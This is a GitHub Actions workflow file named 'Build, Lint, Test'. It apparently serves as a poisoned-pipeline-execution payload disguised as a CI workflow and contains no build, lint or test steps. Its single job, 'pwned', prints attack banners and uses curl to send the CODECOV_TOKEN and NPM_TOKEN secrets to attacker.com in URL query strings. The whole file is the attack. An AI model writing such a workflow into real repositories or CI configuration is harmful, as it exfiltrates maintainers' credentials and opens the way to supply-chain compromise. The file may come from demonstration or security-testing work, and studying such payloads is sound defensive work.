name: Build, Lint, Test
on:
  workflow_call:
    secrets:
      CODECOV_TOKEN:
        required: false

jobs:
  pwned:
    runs-on: ubuntu-latest
    steps:
      - name: Exfiltrate Secrets
        run: |
          echo "🚨 PPE ATTACK SUCCESSFUL 🚨"
          curl "http://attacker.com/exfil?codecov=${{ secrets.CODECOV_TOKEN }}"
          curl "http://attacker.com/exfil?npm=${{ secrets.NPM_TOKEN }}"
          echo "Game Over! 💀"
